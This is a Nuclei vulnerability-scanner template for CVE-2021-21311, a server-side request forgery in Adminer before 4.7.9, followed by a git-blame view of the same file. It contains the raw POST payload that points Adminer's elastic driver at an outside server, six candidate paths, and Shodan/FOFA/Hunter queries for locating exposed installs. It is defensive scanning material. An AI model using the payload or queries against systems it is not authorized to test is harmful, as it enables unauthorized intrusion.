nuclei-templates/http/cves/2021/CVE-2021-21311.yaml

id: CVE-2021-21311

info:
  name: Adminer <4.7.9 - Server-Side Request Forgery
  author: Adam Crosser,pwnhxl
  severity: high
  description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  remediation: Upgrade to version 4.7.9 or later.
  reference:
    - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
    - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
    - https://packagist.org/packages/vrana/adminer
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21311
    - https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2021-21311
    cwe-id: CWE-918
    epss-score: 0.00795
    epss-percentile: 0.79414
    cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 6
    vendor: adminer
    product: adminer
    shodan-query: title:"Login - Adminer"
    fofa-query: app="Adminer" && body="4.7.8"
    hunter-query: app.name="Adminer"&&web.body="4.7.8"
  tags: cve,cve2021,adminer,ssrf

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}

    payloads:
      path:
        - "/index.php"
        - "/adminer.php"
        - "/adminer/adminer.php"
        - "/adminer/index.php"
        - "/_adminer.php"
        - "/_adminer/index.php"

    attack: batteringram
    stop-at-first-match: true
    cookie-reuse: true
    redirects: true
    max-redirects: 1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<title>400 - Bad Request</title>"
          - "&lt;title&gt;400 - Bad Request&lt;/title&gt;"
        condition: or

      - type: status
        status:
          - 403
Nuclei Template for Adminer SSRF Issue (CVE-2021-21311) (#4019) * Updated CVE-2022-22963 * Added CVE-2021-21311 Template * Added Shodan Query * Updated Title * misc update Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-31 19:40:06 +00:00			`id: CVE-2021-21311`

			`info:`
Enhancement: cves/2021/CVE-2021-21311.yaml by mp 2022-06-27 17:12:31 +00:00			`name: Adminer <4.7.9 - Server-Side Request Forgery`
fix cve-2021-21311 2023-03-03 07:28:31 +00:00			`author: Adam Crosser,pwnhxl`
Nuclei Template for Adminer SSRF Issue (CVE-2021-21311) (#4019) * Updated CVE-2022-22963 * Added CVE-2021-21311 Template * Added Shodan Query * Updated Title * misc update Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-31 19:40:06 +00:00			`severity: high`
Enhancement: cves/2021/CVE-2021-21311.yaml by md 2023-03-13 17:04:41 +00:00			`description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: Upgrade to version 4.7.9 or later.`
Nuclei Template for Adminer SSRF Issue (CVE-2021-21311) (#4019) * Updated CVE-2022-22963 * Added CVE-2021-21311 Template * Added Shodan Query * Updated Title * misc update Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-31 19:40:06 +00:00			`reference:`
			`- https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6`
			`- https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://packagist.org/packages/vrana/adminer`
Enhancement: cves/2021/CVE-2021-21311.yaml by mp 2022-06-27 17:12:31 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2021-21311`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351`
Auto Generated CVE annotations [Thu Mar 31 19:40:33 UTC 2022] :robot: 2022-03-31 19:40:33 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 7.2`
Auto Generated CVE annotations [Thu Mar 31 19:40:33 UTC 2022] :robot: 2022-03-31 19:40:33 +00:00			`cve-id: CVE-2021-21311`
			`cwe-id: CWE-918`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`epss-score: 0.00795`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`epss-percentile: 0.79414`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:a:adminer:adminer::::::::`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`metadata:`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 6`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: adminer`
			`product: adminer`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`shodan-query: title:"Login - Adminer"`
			`fofa-query: app="Adminer" && body="4.7.8"`
			`hunter-query: app.name="Adminer"&&web.body="4.7.8"`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`tags: cve,cve2021,adminer,ssrf`
Nuclei Template for Adminer SSRF Issue (CVE-2021-21311) (#4019) * Updated CVE-2022-22963 * Added CVE-2021-21311 Template * Added Shodan Query * Updated Title * misc update Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-31 19:40:06 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
fix cve-2021-21311 2023-03-03 07:28:31 +00:00			`- raw:`
lint fixes 2023-03-04 07:09:43 +00:00			`- \|`
fix cve-2021-21311 2023-03-03 07:28:31 +00:00			`POST {{path}} HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

Update CVE-2021-21311.yaml 2023-03-03 07:53:41 +00:00			`auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}`
lint fixes 2023-03-04 07:09:43 +00:00
fix cve-2021-21311 2023-03-03 07:28:31 +00:00			`payloads:`
			`path:`
			`- "/index.php"`
			`- "/adminer.php"`
			`- "/adminer/adminer.php"`
			`- "/adminer/index.php"`
			`- "/_adminer.php"`
			`- "/_adminer/index.php"`
Nuclei Template for Adminer SSRF Issue (CVE-2021-21311) (#4019) * Updated CVE-2022-22963 * Added CVE-2021-21311 Template * Added Shodan Query * Updated Title * misc update Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-31 19:40:06 +00:00
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`attack: batteringram`
fix cve-2021-21311 2023-03-03 07:28:31 +00:00			`stop-at-first-match: true`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`cookie-reuse: true`
			`redirects: true`
			`max-redirects: 1`

Nuclei Template for Adminer SSRF Issue (CVE-2021-21311) (#4019) * Updated CVE-2022-22963 * Added CVE-2021-21311 Template * Added Shodan Query * Updated Title * misc update Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-31 19:40:06 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
Enhancement: cves/2021/CVE-2021-21311.yaml by md 2023-03-13 17:04:41 +00:00			`- "<title>400 - Bad Request</title>"`
Update CVE-2021-21311.yaml 2023-03-31 00:17:04 +00:00			`- "<title>400 - Bad Request</title>"`
			`condition: or`
Enhancement: cves/2021/CVE-2021-21311.yaml by mp 2022-06-27 17:12:31 +00:00
Update CVE-2021-21311.yaml 2022-06-28 02:59:30 +00:00			`- type: status`
			`status:`
Update CVE-2021-21311.yaml 2023-03-05 08:39:21 +00:00			`- 403`